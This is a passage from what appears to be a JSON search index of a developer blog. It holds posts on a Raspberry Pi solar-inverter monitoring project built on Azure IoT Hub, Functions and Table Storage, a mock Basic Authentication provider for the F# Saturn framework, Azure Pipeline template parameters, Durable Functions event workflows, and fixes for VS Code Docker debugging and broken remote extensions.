different structures instead of doing joins. But I do still want to have a loose relationship between each piece of data, so for that I’m generating a correlation ID that is attached to the message so each record can be related if I want.\nChoosing Our Storage Type So let’s take stock, we want to store half a dozen different data structures in a non-relational manner with some basic query support. Oh, and I want it to be cheap (hey, it’s my credit card each month!). With all this in mind I landed on Azure Table Stroage.\nSince I’m using F# I have Record Types that represent the different structures:\n1 2 3 4 5 6 7 8 9 type PanelInfo = { [<PartitionKey>] Panel: string [<RowKey>] Id: string MessageId: string Current: float // Iin# Volts: float // Vin# Watts: float // Pin# MessageTimestamp: DateTime // SysTime CorrelationId: string } Source\nYou’ll see here that I have a CorrelationId property, this allows me to trace the panel record (of which I have 2 per message) back to the full data set when it was sent up. I also have a timestamp in there for the message that allows me to group them over time.\nFor each of my data structures I use a different table rather than a combined table. This is mainly so I can look at an individual type and not find data gaps when the structure of each record is different.\nIt’s Not Perfect It’s worth noting though that this isn’t a perfect solution. When I started looking into the Power BI reporting my friend Dom Raniszewski asked me why I was using Table and not Blob, which would be more efficient. And he’s right, there are a number of inefficiencies in how the data is stored for read in Power BI, but the reason for that is I also wanted an easy programmatic model so I could build my own real-time reporting (Power BI refreshes the data every 24 hours). I’m going to keep it as is for the moment but we’ll see, I may revise it in the future.\nAnd it turns out that future is now, as while writing this post I realised I had a design flaw in the way I’m storing data for retrieval. Since the main view I want is at the day level, not seconds (which I capture in) I need some way to view that. But I can’t do it because the date is a timestamp to the second and Table Storage’s query engine isn’t advanced enough. I’m going to think through how to best address this and retrofit it back into the 30k+ records I already have in storage!\nConclusion Data is often a cornerstone of an IoT project and ensuring you have the right approach to storing it will dramatically improve the benefit you can get from it. As a technologist, your thought might immediately jump to choosing the right database type and then determine how to work your application into it.\nInstead, I’d encourage you to flip the direction, start thinking about what you want to do with your data and then find out what will be the best fit for that.\nFor me Table Storage is the best fit for a number of reasons, but there are still imperfect edges that I’ll have to deal with.\n", "id": "2019-06-07-home-grown-iot-data" }, { "title": "Home Grown IoT - Solution Design", "url": "https://www.aaron-powell.com/posts/2019-06-05-home-grown-iot-solution-design/", "date": "Wed, 05 Jun 2019 09:06:59 +1000", "tags": [ "fsharp", "iot" ], "description": "How I came to the solution design for my IoT project", "content": "Now I have an idea for the IoT project I want to make it’s time to think about how to go about building it. As I stated in the prologue I don’t have any experience building a proper IoT project so this was very much a trial-and-error thing. In fact, I actually did about 3 different designs throughout the development of the project and today I want to talk about those different approaches and why certain things were scrapped.\nDesign Fundamentals From the outset I had an idea of what the basic design should look like for the solution.\nThe idea was the have a Raspberry Pi (image courtesy of my colleague Damian Brady) that talks to the inverter and then when it gets the data it’ll push it up to an Azure Function which then lands the data into Azure Table Stroage.\nYou might be wondering why I went with Azure Functions over an App Service. Initially it was a decision made purely by cost, I want to run this solution with as little cost to myself as possible, and Azure Fuctions gives me this. Now, I could’ve used a free-tier App Service instead but as we’ll see through the design evolution I ended up needing more of what Functions provides than just HTTP endpoints.\nThe same goes for the decision to use Table Storage over any other storage in Azure. My data is reasonably structured, but it’s not really relational, so I don’t need a full SQL server. I liked the idea of Cosmos DB as it is essentially a NoSQL database, but it’s really designed for scale well beyond the scale that my little project runs (minimum throughput is 4000 request units per second and I’m doing 1 request every 20 seconds 🤣). If I was deploying this to monitor multiple residences I’d look at Cosmos, but for my 1 house, the ~$1 per month of Azure Storage will be fine.\nLastly, I needed to make a decision on what language I was going to build in. Given a Raspberry Pi is my deployment target it makes sense to run Linux on it so I need a language that can run on Linux. I also wanted to have a single language across the whole stack, partially so I could share code (if needed) but more so I wasn’t jumping back and forth between languages. Azure Functions is the thing I’ll have least control over so it was what drove my decision, but it didn’t really narrow it down much because it supports a lot of languages! In the end I decided to settle on F# for no reasons other than I love the language and I hadn’t done anything overly complex with it for a while. Oh and with .NET Core I can easily run it on a Raspberry Pi. 😉\nConsidering Security When it came to the design security was something I was thinking about because, at the end of the day, the last thing you want to do with your IoT project is add another device to a botnet. Because of this I wanted to ensure that my Raspberry Pi would not need to be internet addressable, only that it would be able to communicate out of my network to Azure resources. And this is something that you should always think about when it comes to IoT projects, what are you doing to ensure they can’t be compromised? Are you keeping them off the internet if they don’t need to be? Are you using a VPN to communicate to your home base (cloud or on prem)? Follow the approach of least-privilege, keep things as disconnected as you can and use a push-based model or have the device establish an outbound socket rather than home base searching for the device.\nDesign #1 My first cut of the solution was simple, really simple. My idea was to create a .NET Core console application that I’d rsync over to the Raspberry Pi which will talk to a HTTP Endpoint Azure Function. Coincidently, this is what lead me to write this post, as I was just starting to setup my Functions project!\nThis idea was beautifully simple, the console application would do a HTTP GET to the endpoints I’d identified in my inverter and then just POST the response up to an Azure Function which would write it to Table Storage.\nDesign #1.5 Once I was a bit underway with the development I was finding a bit of friction with the way my local workflow went. I’ll do a separate blog about local dev, but ultimately I wanted to have a more predictable local environment relative to production, so I decided to introduce Docker. This is easy for both the console application and Functions as Microsoft provides Docker images for both of them. It also means I don’t have to host my Functions on Azure, I could put them on the Raspberry Pi to reduce latency between the HTTP calls. I ended up no doing that as I didn’t want to put too much load on the Raspberry Pi.\nDesign #2 Everything was tracking along nicely and I started chatting with fellow Advocate Dave Glover, who specialised in IoT. Dave asked me if I’d looked at using IoT Hub as part of my solution, which I had not (I’d only vaguely heard of it and had no idea what it was for other than “IoT” 🤣). And this resulted in a pretty radical overhaul of my architecture.\nAdding IoT Hub Up until now I had been talking directly from the console application to the Azure Functions via HTTP. Introducing IoT Hub into the mix drastically changes this, rather than talking to the Functions I talk to IoT Hub which has an event stream that I can consume. IoT Hub also allows you to send messages to the device from Azure which would be useful if you need to update configuration on the fly. There’s a number of overlaps between IoT Hub and Event Hubs since both are streams that you consume messages from (and in IoT Hub you actually subscribe to an Event Hub to get the messages).\nAnd of course Azure Functions has IoT Hub bindings, meaning that we can easily consume those messages. Now our design looks like this:\nNow we’re no longer talking directly to the Function, instead we’re pushing into the IoT Hub message stream and the Function will run whenever new message comes in. This would allow the solution to scale up much faster than it previously could, it also means that if for some reason the Function App goes offline (such as, when it’s deployed) I don’t drop messages, they’ll just sit in the stream until they get consumed. This is also where my decision to use Functions over App Services paid off too, as I don’t need any HTTP endpoints in my Functions anymore, they will all just use the IoT Hub bindings.\nHandling Multiple Message Types When I was POST’ing at different HTTP endpoints in my Functions application it was easy to handle the different data structures that I get back from the inverter (I have 3 endpoints I monitor there). But moving to IoT Hub changed this, I no longer talk to the Function directly, I only pump messages into a message stream, so how do we handle different structures?\nIt’s time to look at message routing in IoT Hub. Routing does what it sounds like it does, provides you with the tools to send messages to different places depending on rules that you provide to it. Through a Route you can redirect the message from the IoT Hub stream to a secondary Event Hub, Service Bus Queue, Service Bus Topic or Blob Storage.\nThe way you create a Route is to define a message query against something that is important on the message, either properties of the message or the message body itself. For example, if you were monitoring a temperature sensor and receive messages where a threshold is exceeded you can send that message to a high priority stream rather than the primary stream.\nFor me, because each message body is so radically different, I add a special property to the message before it is sent to IoT Hub that indicates the type of message. I then redirect this to one of several different Event Hubs so that the Functions can subscribe to only the correct one and handle only a single data type.\nHandling a Message Multiple Times The final thing I wanted to do with the new Event Hub-based Functions was shard the data a little bit. One of the endpoints that I monitor contains a lot of data that I want to look more finely at, in particular, split out the two panel groups so I can report on each independently.\nThis means I either have to have one large Function that does many different things, or I have to read the message multiple times. Now, you can’t actually read the message multiple times, it’s a FIFO (First In, First Out) model, so you need to setup up a Consumer Group-per-Function so that each Function has its own view of the message. It also means that we won’t use the IoT Hub binding for Azure Functions but the Event Hubs bindings instead (which are really just the same) and provide the appropriate Consumer Group to the binding.\nComplete Design I now have all the pieces of the puzzle connected up and it looks like this:\nMy Raspberry Pi talks to the inverter and then sends the message up wit IoT Hub with a tag on it indicating the type of message. IoT Hub will then route the message based on the type to one of 3 Event Hubs (all within the same Event Hub Namespace). These Event Hubs have a consumer group-per-Function so that my Azure Functions can shard the messages into different tables with Table Storage!\nI quite like how the design turned out. There may be a lot more moving parts in it that I had originally thought I’d have, but each of these play an important role, from IoT Hub allowing me to consume messages without worrying about processing them, Event Hubs allows me to direct messages to different consumption points, Azure Functions can process the data at scale (which I don’t need, but is important in IoT) and eventually Table Storage for unstructured data storage that I can report on in the future.\nSo what do you think of the design? Anything you think I’ve missed? Anything that’s over thought?\n", "id": "2019-06-05-home-grown-iot-solution-design" }, { "title": "Home Grown IoT - Prologue", "url": "https://www.aaron-powell.com/posts/2019-05-30-home-grown-iot-prologue/", "date": "Thu, 30 May 2019 08:06:52 +1000", "tags": [ "fsharp", "iot" ], "description": "Some beginning words on the Home Grown IoT project I've been working on for a while", "content": "I’ve always been a bit of a hardware tinkerer. Growing up my dad would bring home old radios, telephones and other electronics from work and hand them to me along with a screwdriver and multimeter and let me poke around with them. I had an electronics kit that had all kinds of sensors, lights and switches that you could connect together to make whatever you wanted to make. We had breadboards, wires, soldering irons, resistors, capacitors, LED’s, switches and everything in between to make random little pieces of electronics.\nWhen we got our first computer, a 486 66 DX (with a turbo button!), I pulled it apart, with strict instruction to a) know where the cables went and b) no soldering irons! Helped set up our home token ring network and eventually wire our house with ethernet.\nSo when cheap, consumer-grade IoT became prevalent with Raspberry Pi’s and Arduino’s it seemed only natural that I’d grab some myself and play around with them.\nAnd I did what everyone does with an IoT device…\nSource @ThePracticalDev\nSeriously, I have a Pi that is somewhere in my house, I’m unsure where though, it’s just in a box somewhere. Similarly, I have a bunch of NodeMCU chips which have 4MB memory, 16 pins and wifi that just sit on a shelf gathering dust.\nThe problem I have when it comes to IoT projects is that I just have no idea what to make, and that is half the battle.\nSparking an Idea At the end of 2018 my wife and I decided to get solar panels put on our roof. We got a total of 18 panels that have a peak output of 5.5kWh, more than enough energy production for our home needs. We also got an inverter, an ABB UNO-DM series inverter to connect the panels to our mains and push excess power generated back to the grid.\nThe interesting thing about inverters these days is that pretty much all of them come with a built-in wifi endpoint, which of course ours does. I connect it to the wifi and I am presented with some dashboards.\nWell, that’s pretty nifty isn’t it?\nBut I’m a dev at the end of the day, so what do I do next? Fire up the dev tools of course!\nAnd what I found was that the dashboard is just an AngularJS application over a series of HTTP endpoints secured with basic authentication. What’s more is that the data is just basic JSON payloads!\nMy Home Grown IoT Project I now have something sitting on my home network that is generating interesting data, and what’s more it’s running a web server that I can connect to using an authentication model I can implement with very little effort.\nThis gives me something to aim for. My goals for the project were as follows:\nCreate a solution that can run on a Raspberry Pi to pull the data from my inverter Store the data somewhere Create my own dashboards to view the power generated See what else is interesting in the data Since this would be more first foray into a proper IoT project I wanted to do it right. I wanted an easy local development experience, including being able to develop when I’m not at home; I want it to be easy to deploy; I want to avoid exposing my Pi (or inverter) to the public internet.\nSo over the last few months I’ve slowly chipped away at it and have finally deployed Sunshine, my solar panel monitoring system! The code is up on GitHub if you wish to have a poke around, but it’s designed around my setup, so it’s not really a general purpose solution. At its core it’s a .NET Core application (written in F#) that runs on Docker, using Azure IoT Hub for device connectivity, Azure IoT Edge to deploy with Azure Pipelines and data processing with Azure Functions.\nThroughout this series I’m going to go through how I went about building the project, the technologies I’ve used, the decisions I made and why I made them. I’ve learnt a lot building this (I’ve overhauled it majorly a few times 🤣) and hopefully it’ll give you some pointers on where to go with your own IoT projects.\n", "id": "2019-05-30-home-grown-iot-prologue" }, { "title": "Extending Saturn to support Basic Authentication", "url": "https://www.aaron-powell.com/posts/2019-05-27-implementing-basic-auth-on-saturn/", "date": "Mon, 27 May 2019 15:44:22 +1000", "tags": [ "fsharp" ], "description": "A guide on extending Saturn, an F# web framework, by creating a Basic Authentication provider", "content": "Recently I needed to create a mock API for local development on a project and I decided to use Saturn, which describes itself thusly:\nA modern web framework that focuses on developer productivity, performance, and maintainability\nSaturn is written in F#, and given this whole project is F# it seemed like a logical fit. There’s a getting started guide, so I won’t go over that, instead I’ll focus on something I needed specifically for this projet, Basic Authentication, because the API I was mocking uses that under the hood and I wanted to simulate that.\nExtending Saturn Applications Conceptually, Saturn uses Computation Expressions for abstracting away the ASP.NET pipeline and giving you a very clean F# syntax for defining your application.\nI wanted to make the application definition work like this:\n1 2 3 4 let app = application { use_basic_auth // the rest of our app setup url (sprintf "http://0.0.0.0:%d/" port) } And to do this we’ll need to create a custom operation on Saturns ApplicationBuilder. Thankfully, F# makes it very easy to extend types you don’t own, so let’s get started:\n1 2 3 4 type ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth(state : ApplicationState) = state We’ll define our new attribute on the application computation expression and call it use_basic_auth and it will execute the defined function, which has a signature of ApplicationState -> ApplicationState.\nAdding middleware The first thing we’re going to need to do is to edit the middleware that Saturn uses to include authentication, and since it’s ASP.NET Core under the hood we need to add it’s middleware for Identity. Let’s update our UserBasicAuth function:\n1 2 3 4 5 6 7 8 type ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth state = let middleware (app : IApplicationBuilder) = app.UseAuthentication() { state with AppConfigs = middleware::state.AppConfigs } That was easy! We’ve added a new function called middleware that added the authentication middleware to the pipeline. Then we’ll use the :: List function to append our middleware to the head of the middleware collection and create a new record type using the current ApplicationState, just updating the AppConfigs property.\nImplementing Basic Authentication With Authentication enabled in our pipeline, we next need to tell it what kind of authentication we’re wanting to use and how to actually handle it!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 type ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth state = let middleware (app : IApplicationBuilder) = app.UseAuthentication() let service (s : IServiceCollection) = s.AddAuthentication("BasicAuthentication") .AddScheme<AuthenticationSchemeOptions, BasicAuthHandler>("BasicAuthentication", null) |> ignore s.AddTransient<IUserService, UserService>() |> ignore s { state with ServicesConfig = service::state.ServicesConfig AppConfigs = middleware::state.AppConfigs } Now we have a service function that takes the IServiceCollection, adds the Authentication service as BasicAuthentication (so the pipeline knows it’s that type), adds the handler (a type called BasicAuthHandler) and also registers a type in the Dependency Injection framework for accessing our users. We then modify our record type on return with this new function and it’s good to go!\nImplementing the Basic Authentication Handler Ok, we’re not quite done yet, we should have a look at how we actually implement the Basic Authentication handler in the BasicAuthHandler type, and our user store.\nLet’s start with the user store, since I’ve done it quite simply, after all, it’s for a mock:\n1 2 3 4 5 6 7 8 9 10 11 12 type IUserService = abstract member AuthenticateAsync : string -> string -> Async<bool> type UserService() = let users = [("aaron", "password")] |> Map.ofList interface IUserService with member __.AuthenticateAsync username password = async { return match users.TryGetValue username with | (true, user) when user = password -> true | _ -> false } Yep, nothing glamerous here, I’ve just created a type that tests for a user and password in memory. In a non-mock system you might want to implement it more securely, but it does what I need for now. 😉 I’ve also created this as an interface so that I can inject it downcast, or I could mock it if I was to write tests (Narator: He didn’t write tests).\nNow that we have a way to validate that credentials are valid for a user it’s time to implement the class that will handle authentication, BasicAuthHander:\n1 2 type BasicAuthHandler(options, logger, encoder, clock, userService : IUserService) = inherit AuthenticationHandler<AuthenticationSchemeOptions>(options, logger, encoder, clock) This type inherits from AuthenticationHandler within the ASP.NET Core framework and will require us to implement the HandleAuthenticateAsync function to be useful, so let’s start there:\n1 2 3 4 5 type BasicAuthHandler(options, logger, encoder, clock, userService : IUserService) = inherit AuthenticationHandler<AuthenticationSchemeOptions>(options, logger, encoder, clock) override this.HandleAuthenticateAsync() = task { return AuthenticateResult.Fail "Not Implemented" } Side note: I’m using the TaskBuilder.fs package to create a Task<T> response using the task computation expression.\nThis function is executed on every request as part of the middleware pipeline and I’m going to need to ensure that the Authorization header is provided and it has a valid Basic Auth token in it. Let’s start by ensuring the header exists with a match expression:\n1 2 3 4 5 6 7 override this.HandleAuthenticateAsync() = let request = this.Request match request.Headers.TryGetValue "Authorization" with | (true, headerValue) -> task { return AuthenticateResult.Fail("Not implemented") } | (false, _) -> task { return AuthenticateResult.Fail("Missing Authorization Header") } The pattern matching will just check that we have the header and break into the appropriate block if the header exists, if it doesn’t we’ll just fail the challenge and result in a 401 response.\nTo validate the token I’m going to start with a quick function to unpack it like so:\n1 2 3 4 5 6 7 8 9 10 11 type Credentials = { Username: string Password: string } let getCreds headerValue = let value = AuthenticationHeaderValue.Parse headerValue let bytes = Convert.FromBase64String value.Parameter let creds = (Encoding.UTF8.GetString bytes).Split([|':'|]) { Username = creds.[0] Password = creds.[1] } This will just decode the encoded string into a username:password pair that I return as a record (you could use an anonymous record type or a tuple, entirely up to you). Now we can validate it with our IUserService:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 override this.HandleAuthenticateAsync() = let request = this.Request match request.Headers.TryGetValue "Authorization" with | (true, headerValue) -> async { let creds = getCreds headerValue.[0] let! userFound = userService.AuthenticateAsync creds.Username creds.Password return match userFound with | true -> let claims = [| Claim(ClaimTypes.NameIdentifier, creds.Username); Claim(ClaimTypes.Name, creds.Username) |] let identity = ClaimsIdentity(claims, this.Scheme.Name) let principal = ClaimsPrincipal identity let ticket = AuthenticationTicket(principal, this.Scheme.Name) AuthenticateResult.Success ticket | false -> AuthenticateResult.Fail("Invalid Username or Password") } |> Async.StartAsTask | (false, _) -> task { return AuthenticateResult.Fail("Missing Authorization Header") } We’ll use another match against this the result of our IUserService.AuthenticateAsync (which uses F# async), and if the user is valid we’ll create a claim ticket and return that to the pipeline successfully for the request the continue.\nWiring it up with our router It’s now time to add authentication over the route(s) that we want to have authentication on, and we do that with the router computation expression. We’ll start with a pipeline:\n1 2 3 4 5 let matchUpUsers : HttpHandler = fun next ctx -> next ctx let authPipeline = pipeline { requires_authentication (Giraffe.Auth.challenge "BasicAuthentication") plug matchUpUsers } Setting on the pipeline the requires_authentication attribute to a BasicAuthentication challenge from Giraffe (the web framework Saturn builds on top of).\nFinally, it’s time for our router:\n1 2 3 4 let webApp = router { pipe_through authPipeline // define routes } Conclusion The computation expression design of Saturn is really neat, the fact you can just extend the type that represents the part of Saturn that you want to extend. Through this we can add a custom authentication provider quite easily.\nHopefully this helps others looking to extend Saturn. 😊\n", "id": "2019-05-27-implementing-basic-auth-on-saturn" }, { "title": "Azure Pipeline YAML Templates and Parameters", "url": "https://www.aaron-powell.com/posts/2019-05-24-azure-pipeline-templates-and-parameters/", "date": "Fri, 24 May 2019 11:56:00 +1000", "tags": [ "azure-devops" ], "description": "Using parameters with job templates in Azure Pipelines", "content": "I’m currently building a project that uses Azure Pipelines, specifically the YAML Pipeline so that I can have it in source control.\nBut the Pipeline has a number of tasks that I have to execute multiple times with different parameters, so I grouped them into a job and just copy/pasted them the 3 times I needed. This was a quick way to get it tested and working, but as I modified the Pipeline I’d have to do the modification multiple times, which was a bit annoying (a few times I forgot to replicate the change and broke the build!).\nEnter Templates In the past I’ve used Task Groups in the visual Pipeline builder to extract a common set of tasks to run multiple times. With YAML we have Templates which work by allowing you to extract a job out into a separate file that you can reference.\nFantastic, it works just as I want it to, the only thing left is to pass in the various parameters. That’s easy to do from the main Pipeline:\n1 2 3 4 5 jobs: - template: templates/npm-with-params.yml # Template reference parameters: name: Linux vmImage: 'ubuntu-16.04' And then I hit a problem…\nWorking with output variables Not all the variables I need to pass in are static values, some are the result of other tasks (in this case ARM deployments), which means that I am setting some multi-job output variables.\nPrior to the refactor I was accessing the output variable with $[dependencies.JobName.outputs['taskName.VariableName']] and it was all good, now I need to pass it in, so we’ll update our template call:\n1 2 3 4 5 6 7 jobs: # omitted parent jobs - template: templates/some-template.yml # Template reference parameters: STORAGE_ACCOUNT_NAME: $[dependencies.JobName.outputs['taskName.StorageAccountName']] name: SomeName azureSubscription: '...' Then in the template I would use it like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 parameters: STORAGE_ACCOUNT_NAME: '' name: '' jobs: - job: ${{ parameters.name }} pool: vmImage: 'Ubuntu-16.04' steps: - task: AzureCLI@1 inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: ${{ parameters.STORAGE_ACCOUNT_NAME }} inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') # more script here I run this and get an error:\naz storage account keys list: error: Storage account ‘$[dependencies.JobName.outputs[’taskName.StorageAccountName’]]’ not found.\nUmm… what? Yes, you’re right Azure, that isn’t the name of the storage account, it’s the dynamic variable you should’ve evaluated! Why didn’t you evaluate?!\nEvaluation of parameters in templates So here’s the problem, the parameter I’m passing to my template isn’t being evaluated, which means that it’s being passed in a raw manner to the script when I want to use it. But never fear there’s an easy fix, you just need to assign the parameter to a variable:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 parameters: STORAGE_ACCOUNT_NAME: '' name: '' jobs: - job: ${{ parameters.name }} pool: vmImage: 'Ubuntu-16.04' variables: STORAGE_ACCOUNT_NAME: ${{ parameters.STORAGE_ACCOUNT_NAME }} steps: - task: AzureCLI@1 inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: $(STORAGE_ACCOUNT_NAME) inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') # more script here Now you refer to the variable not the parameter in your tasks.\nConclusion Honestly, I racked my brain on this for the better part of a day, and it really isn’t obvious that this is the case. I only stumbled on it by accident after trying a lot of other things.\nHopefully this helps someone else out when they are trying to work out why their template parameters aren’t evaluated!\n", "id": "2019-05-24-azure-pipeline-templates-and-parameters" }, { "title": "Fixing Issue When You Can't Connect to Docker Debugger in VS Code", "url": "https://www.aaron-powell.com/posts/2019-05-17-fixing-cant-connect-to-docker-debugger/", "date": "Fri, 17 May 2019 15:35:46 +1000", "tags": [ "docker", ".net", "vscode", "debugging" ], "description": "Some Docker containers can't connect because they can't find the process, here's a fix", "content": "I’ve previously blogged about debugging .NET Docker containers in VS Code but recently I came across a problem with a container that I had a .NET Core application in failing to connect the debugger with the following error:\nExecuting: docker.exe exec -i sunshine-functions sh -s < /home/aaron/.vscode-remote/extensions/ms-vscode.csharp-1.19.1/scripts/remoteProcessPickerScript Linux stderr: sh: 1: ps: not found Error Message: Command failed: docker.exe exec -i sunshine-functions sh -s < /home/aaron/.vscode-remote/extensions/ms-vscode.csharp-1.19.1/scripts/remoteProcessPickerScript sh: 1: ps: not found THe crux of the problem is that it’s unable to list the processes that I need to pick from in VS Code.\nThe image I was using as my base image was the Azure Functions Host, specifically mcr.microsoft.com/azure-functions/dotnet and it turns out that this particular image doesn’t have ps anywhere in it!\nThankfully, this is an easy fix, you need to install procps using apt install, assuming your image is from a distro that supports apt of course. 😉\nOnce ps is installed into your image you’ll now be able to list the processes and then debug your image.\n", "id": "2019-05-17-fixing-cant-connect-to-docker-debugger" }, { "title": "Creating Event-Based Workflows With Azure Durable Functions", "url": "https://www.aaron-powell.com/posts/2019-05-08-event-based-workflows-with-durable-functions/", "date": "Wed, 08 May 2019 10:37:32 +1000", "tags": [ "azure-functions", "fsharp", "csharp", "javascript" ], "description": "How to orchestrate event-based workflows using Azure Durable Functions", "content": "Durable Functions is an extension of the Azure Functions serverless stack that introduces state management and orchestration across functions without the need to write the plumbing code yourself.\nToday, I want to take a look at the scenario of creating a client-driven event workflow system. Our client will initiate a request and that will start a workflow. We’ll use the HTTP binding for our function and also pass in the OrchestrationClient:\n1 2 3 4 5 6 7 8 9 10 11 [<FunctionName("StartWorkflow")>] let startWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "start/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Starting a new workflow for %s" input) let! _ = starter.StartNewAsync(eventName, input) return OkResult() } The route has a parameter, input, that’s passed in and we’ll use that as our identifier across API calls (you could use the instanceId returned from starting the workflow instead if you want) otherwise there’s nothing overly complex here, we use the DurableOrchestrationClient to start the workflow using StartNewAsync(<name of instance>, <data for instance>).\nNow we’ll need to create our workflow function. This will use the OrchestrationTrigger:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 module Workflow open Microsoft.Azure.WebJobs open Microsoft.Extensions.Logging open FSharp.Control.Tasks.V2.ContextInsensitive let eventName = "Workflow" [<FunctionName("Workflow")>] let run ([<OrchestrationTrigger>] context : DurableOrchestrationContext) (logger : ILogger) = task { let input = context.GetInput<string>() sprintf "Starting workflow for %s" input |> logger.LogInformation do! context.WaitForExternalEvent(eventName) sprintf "Workflow for %s is stopping" input |> logger.LogInformation } The module defines the name of the event, Workflow, that we used in the first function, in then unpacks the data passed in using context.GetInput<string>() and then tells the function to sleep until an event is triggered using context.WaitForExternalEvent(eventName).\nNow, this WaitForExternalEvent is an important function, what it’s doing is telling our function that something outside of its control will be controlling its execution and that it should go to sleep until that event is triggered, and that event must be triggered on the specific instance as well. This function is now “sleeping” and not consuming resources (or money) and can sleep for as long as you need it to do. It also returns a Task, meaning it’s async, so you could combine it with a timer and have it only sleep for a period of time if you wanted.\nThe next function that we’re going to create is an HTTP endpoint to check the status of the workflow. This function would be one that you call from the client in a polling manner to perform an action once the workflow has completed.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [<FunctionName("CheckWorkflow")>] let checkWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "check/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Checking workflow for %s" input) let offset = TimeSpan.FromMinutes 20. let time = DateTime.UtcNow let! instances = starter.GetStatusAsync (time.Subtract offset, Nullable(time.Add offset), System.Collections.Generic.List<OrchestrationRuntimeStatus>(), CancellationToken.None) return OkObjectResult(instances |> Seq.find (fun i -> i.Name = eventName && i.Input.ToObject<string>() = input)) } We’re using the HttpTrigger again and also getting an OrchestrationClient provided, but this time we’re using the client to search for all running workflow instances via the GetStatusAsync method (I’m also providing a date range for the search so that it doesn’t find everything in my storage account). Once we have all the instances I’m then looking for any that match the input that is passed in, but if you were using the instanceId you could filter against that. The function then returns an object containing the found instance. This would allow the client to check against it for whether it’s completed or not and make a decision on what to do in the client.\nOur workflow can be started, we are able to poll it and check its status, now it’s time to implement a way to invoke the event and complete the workflow:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [<FunctionName("StopWorkflow")>] let stopWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "stop/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Stopping workflow for %s" input) let offset = TimeSpan.FromMinutes 20. let time = DateTime.UtcNow let! instances = starter.GetStatusAsync (time.Subtract offset, Nullable(time.Add offset), System.Collections.Generic.List<OrchestrationRuntimeStatus>(), CancellationToken.None) return! match instances |> Seq.tryFind (fun i -> i.Name = eventName && i.Input.ToObject<string>() = input) with | Some instance -> task { logger.LogInformation(sprintf "Found a matching instance with id %s" instance.InstanceId) do! starter.RaiseEventAsync(instance.InstanceId, eventName, input) return OkObjectResult(instance) :> IActionResult } | None -> task { sprintf "Didn't find a matching instance for %s" input |> logger.LogInformation return NotFoundResult() } } We’re performing a similar bit of searching logic here to find our workflow instance and if it’s found we use the DurableOrchestrationClient RaiseEventAsync method and provide it with the ID of the workflow instance and the event name that we are waiting for, plus any input that we want to pass for the event.\nThis event will be raised asynchronously and the Workflow function will resume at the point it was waiting for the event, then run through to completion. The important part here is that it is asynchronous, meaning that if you were to poll immediately afterwards then the status might not be completed, because the Workflow function might not have triggered/run to completion.\nConclusion Here we have an example of using events in Durable Functions to control a background job. Admittedly, we’ve used HTTP endpoints to trigger each step of the way but there is no reason why the “stop” function couldn’t be written to wait for an item being written to Blob storage or any other Function trigger.\nIt’s also worth remembering that this processing is all handled asynchronously, so you could wait for multiple events and use a Task.WhenAny to only wait for one event to be triggered, or combine with a timeout so you only wait for an event for a predefined period of time.\nIf you want to have a try yourself I’ve created a sample on GitHub with implementations in F#, C# and JavaScript.\n", "id": "2019-05-08-event-based-workflows-with-durable-functions" }, { "title": "Removing VS Code Remote Extensions", "url": "https://www.aaron-powell.com/posts/2019-05-08-removing-vscode-remote-extensions/", "date": "Wed, 08 May 2019 10:37:32 +1000", "tags": [ "vscode" ], "description": "Fixing problems with a corrupt vscode remote instance", "content": "If you missed the announcement last week the VS Code team have released some remote development extensions which allow you to run VS Code against a remote environment, whether that’s WSL, SSH or running in a container. This is a fantastic extension and I’m totally in love with it, but there’s always the possibility of something going wrong (that’s what happens when you’re living on the edge).\nToday I went to start writing a blog post (not this one!) and in doing so I installed Spell Right, the extension I use for spell checking. As soon as VS Code reloaded things went wrong, it wouldn’t connect to WSL anymore, and it turns out there’s a bug in Spell Right that causes VS Code Remote Extensions to hang.\nThis isn’t really a problem with Spell Right, I am using a preview version of VS Code and a preview extension pack, I’m just surprised I hadn’t hit a problem sooner! 🤣\nAnyway, we have a problem now and I need to remove that extension from the remote host, but here’s the catch, you use VS Code to manage remotely installed extensions and if it can’t connect to the remote host then you can’t manage the extensions!\nDeleting Remote Extensions without VS Code I started reading through the docs to work out how to remove the extension, with no luck. My next step was to try and unpack the extension and hope I could find something in there, but that wasn’t sounding like a fun idea… Thankfully I work with a really knowledgable team and my colleague Bruno Borges came to my rescue.\nIt turns out that extensions are installed on the remote host at ~/.vscode-remote/extensions, so I fired up WSL, went there and removed the offending extension. And if you need to completely remove the extensions you can rm all folders within there.\nThanks Bruno!\nAlso, if you poke around in the ~/.vscode-remote folder you’ll find a bunch of interesting things in there like the user profile for your remote environment and such. I wouldn’t advise editing them, but they can be a good place to look if you want to try and diagnose issues.\nSo with that extension removed I can write this post about how to remove remote extensions, then get back to the post I actually came here to write! 😜\n", "id": "2019-05-08-removing-vscode-remote-extensions" }, { "title": "Using a Specific Go Version on Azure Pipelines", "url": 